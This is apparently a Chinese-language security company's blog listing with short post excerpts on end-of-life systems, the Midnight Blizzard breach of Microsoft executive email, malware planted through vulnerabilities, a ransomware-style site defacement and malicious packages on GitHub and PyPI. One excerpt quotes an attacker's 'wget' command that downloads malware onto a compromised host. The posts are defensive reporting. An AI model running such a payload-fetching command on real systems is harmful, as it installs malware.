-
Continue reading →: 為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?
我們在為客戶進行資安檢測時,常被問到的問題之一,即是「為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?」 許多公司仍使用Windows XP、CentOS 8,以及其他已停止支援的系統或應用程式。而光盾在檢測時,往往會依照最新版的CVSS評分,將此類問題列入漏洞。 我們常檢測出未有被發布CVE的系統,包含了「主機控制漏洞」,讓駭客可以任意遠端操作主機。但在通報廠商後,廠商表示系統已停止維護,不會進行任何修正。這表示多數停止維護的系統,很可能包含諸多潛藏的零時差漏洞,不會有相關CVE資訊,且永遠不會獲得修正、難以控管。 使用已經停止維護的系統會被認為是重大漏洞的原因主要有以下幾點: 因此,為了確保系統的安全性和穩定性,建議大家使用並維護最新版本的軟體和作業系統,以及及時應用安全更新和修補程式。
-
Continue reading →: 俄羅斯駭客駭入微軟主管的電子郵件信箱
根據新聞報導,一個俄羅斯的駭客組織,名為午夜暴風雪(Midnight Blizzard),又被稱為諾貝爾姆(Nobelium),駭入微軟主管、法律部門的電子信箱中。 這是駭客主要的入侵途徑: 從2023年11月底開始,駭客使用密碼噴灑攻擊(password spray)來入侵一個測試帳號中,建立據點,然後使用該帳戶的權限來入侵微軟的其他企業郵件帳戶,包含主管、法律部門等。駭客亦洩露了一些郵件和附件內容。 由此可見,系統的強度僅等同於最弱的環節。測試用的系統、服務、帳號均應使用「最小權限原則」(Principle of least privilege),防止攻擊者加以利用(最小權限原則是要求計算環境中的每個模組如用戶或電腦程式只能存取當下所必需的訊息或者資源)。 相關連結: https://www.csoonline.com/article/1296269/russia-based-group-hacked-emails-of-microsofts-senior-leadership.html
-
Continue reading →: 駭客利用系統漏洞植入新型惡意程式
光盾研究員不斷發現駭客利用系統漏洞,嘗試於各式系統中植入新型惡意程式。近期一個案例,是攻擊者利用上傳功能,在系統中植入Unix.Virus.Ladvix。此病毒會在Unix系統中挖礦,且駭客可遠端控制受駭的電腦、置入更多惡意檔案。 在另一個例子中,駭客利用了主機控制漏洞(OS Commanding),使用以下指令,控制主機下載病毒(原始IP位址已被遮蔽): wget http://x.x.x.x/df2vGJJ58ivF 由VirusTotal進行偵測,可發現僅一支防毒軟體能正確偵測此支病毒: 防止此類問題需要利用深層防禦(Defense in Depth)的概念。深度防禦(DiD)是一種資訊安全的方法,其中一系列的防禦機制被層層堆疊,以保護有價值的數據和資訊。如果一個機制失效,另一個立即介入以阻止攻擊。這種多層次的方法可提高系統整體的安全性,並應對許多不同的攻擊維度。舉例來說,除了應用程式防火牆、IPS/IDS、防毒之外,主機亦應布署監控機制,偵測並阻擋未知的「內往外」連線。 此外,為防止系統包含重大漏洞,定期的滲透測試、弱點掃描均為必須。這些方式能在駭客破解漏洞之前,先了解問題並修補系統。
-
Continue reading →: 駭客入侵半導體大廠京鼎網站
鴻海集團旗下半導體設備大廠京鼎(3413)遭駭客入侵。根據駭客留在官網的資訊,表示如果京鼎不支付費用,客戶資料將被公開。下面是官網遭駭的原始截圖: 相關新聞網址: https://infosecu.technews.tw/2024/01/16/foxsemicon-been-hacked/
-
Continue reading →: 源碼檢測、弱點掃描和滲透測試有什麼不同?
源碼檢測、弱點掃描和滲透測試是與系統安全相關的不同檢測方式,因此適用性、可檢測的內容、需要時程等等都不一樣。以下是它們的主要區別: 總體而言,源碼檢測主要關注源碼層面的問題,弱點掃描側重於已知漏洞的識別,而滲透測試則模擬實際攻擊,通過多個角度評估系統的安全性。這三者通常作為綜合的安全測試策略的一部份,以提高整體安全性。
-
Continue reading →: 駭客利用GitHub程式入侵系統
光盾研究室發現愈來愈多惡意軟體放置在GitHub、Dropbox、Google Drive、OneDrive和Discord等等服務中,藉由加密、亂碼化等方式規避這些平台的檢測工具。接著,駭客利用系統漏洞或社交工程,在受害系統上植入這些程式。而不少惡意程式在VirusTotal上的檢測率為0%。一些惡意程式會偽裝成正常程式,使相關應對、查核變得更加困難(例如: 光盾研究室發現一惡意程式偽裝成遠端桌面軟體,已有數萬次下載)。 此外,眾多PyPI,例如: httprequesthub、pyhttpproxifier、libsock、libproxy和libsocks5,它們偽裝成用於處理網路代理的函式庫,並將電腦的敏感資料傳給駭客。這是其中一個連結: https://security.snyk.io/vuln/SNYK-PYTHON-HTTPREQUESTHUB-6139265。 此類狀況有爆炸型成長趨勢,且光盾研究室亦發現諸多程式碼已被塞入惡意連結。例如,”jsapi.info”即被光盾檢測出曾被植入重大系統中(因開發人員直接include第三方函式庫),但此網域於2022年為駭客所控制,專門用來散播新型惡意程式。 有鑑於此,完整的第三方元件的查核、滲透測試等等,在系統上線前進行,都非常重要。採取有效的控管方式,方可根本預防此類重大問題。